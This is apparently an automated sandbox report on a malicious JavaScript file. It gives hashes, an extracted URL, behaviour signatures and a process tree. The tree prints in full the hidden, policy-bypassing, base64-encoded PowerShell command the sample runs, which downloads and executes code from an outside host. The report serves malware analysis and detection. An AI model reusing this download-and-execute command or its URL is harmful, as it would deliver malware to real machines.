Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
30-12-2023 05:41
Static task
static1
Behavioral task
behavioral1
Sample
103c0a1116fdbb71a673ba845cff1ef9.js
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
103c0a1116fdbb71a673ba845cff1ef9.js
Resource
win10v2004-20231215-en
General
-
Target
103c0a1116fdbb71a673ba845cff1ef9.js
-
Size
110KB
-
MD5
103c0a1116fdbb71a673ba845cff1ef9
-
SHA1
d016efed452c192b205e9f7e3d830f4deb4cb745
-
SHA256
c866f50e1724b7a93af2a49ce86ff2e46d68589dba15da975d8459d663c71d11
-
SHA512
c0591a52f1efa154a89a12850ba69a62751fdc955bd0e7bf7baaf66ce351e9d6cdd3fc1a4864d4971bf42f5d6b98eab6eac7fb50ba9d4ba8a8ccd1c4225be945
-
SSDEEP
3072:LV4yZwcpVYvvIWq9Ry98guHVBqqg2bcruzUHmLKeMMU7GwbWBPwVGWl9SZ8kV8G3:LCE9R9Ry9RuXqW4SzUHmLKeMMU7GwWBz
Malware Config
Extracted
http://smart-integrator.hr/pornhub.php
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 772 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 772 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 772 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2392 wrote to memory of 3016 2392 wscript.exe 28 PID 2392 wrote to memory of 3016 2392 wscript.exe 28 PID 2392 wrote to memory of 3016 2392 wscript.exe 28 PID 3016 wrote to memory of 772 3016 cmd.exe 30 PID 3016 wrote to memory of 772 3016 cmd.exe 30 PID 3016 wrote to memory of 772 3016 cmd.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\103c0a1116fdbb71a673ba845cff1ef9.js1⤵
- Suspicious use of WriteProcessMemory
PID:2392 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA2⤵
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:772
-
-